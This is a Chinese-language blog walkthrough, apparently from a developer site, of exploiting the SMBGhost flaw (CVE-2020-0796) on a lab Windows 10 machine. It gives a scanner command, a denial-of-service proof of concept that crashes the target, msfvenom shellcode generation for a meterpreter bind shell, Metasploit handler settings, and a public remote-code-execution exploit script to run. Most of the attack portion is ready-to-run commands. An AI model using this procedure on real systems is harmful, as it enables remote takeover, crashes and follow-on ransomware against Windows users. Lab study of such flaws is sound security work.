MSF漏洞验证之CVE-2020-0796

永恒之蓝 2.0 来了,基于 SMBv3 漏洞Windows 8Windows Server 2012 - Windows 10 最新版全部中招,属于系统级漏洞利用这一漏洞会使系统遭受蠕虫型攻击,这意味着很容易从一个受害者感染另一个受害者,一开机就感染。提权后可以做任意操作,例如加密你的文件勒索你。

一、环境准备

目标机:windows10 1903 x64     ip192.168.65.134(关闭防火墙)

攻击机:kali    ip192.168.65.130

二、漏洞检测

1.查看攻击机是否可以攻击
┌──(root💀kali)-[~]
└─# python3 scanner.py 192.168.65.134    
    检测工具下载地址
:https://github.com/ollypwn/SMBGhost 

 

2.蓝屏攻击

POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC

将脚本文件命名2放到mnt目录下
┌──(root💀kali)-[/mnt/2]
└─# python3 CVE-2020-0796.py 192.168.65.134 

开始攻击

攻击成功

3.漏洞利用-getshel

3.1生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

4.监听端口(正向连接的话一定要配置监听,不然会出现反弹不回来)
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //监听端口
set rhost 192.168.65.134  //目标主机
run

脚本下载:

         用生成的shellcodeexploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

https://github.com/chompie1337/SMBGhost_RCE_PoC

5.开始攻击
┌──(root💀kali)-[/mnt/1]
└─# python3 exploit.py -ip 192.168.65.134
 

  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值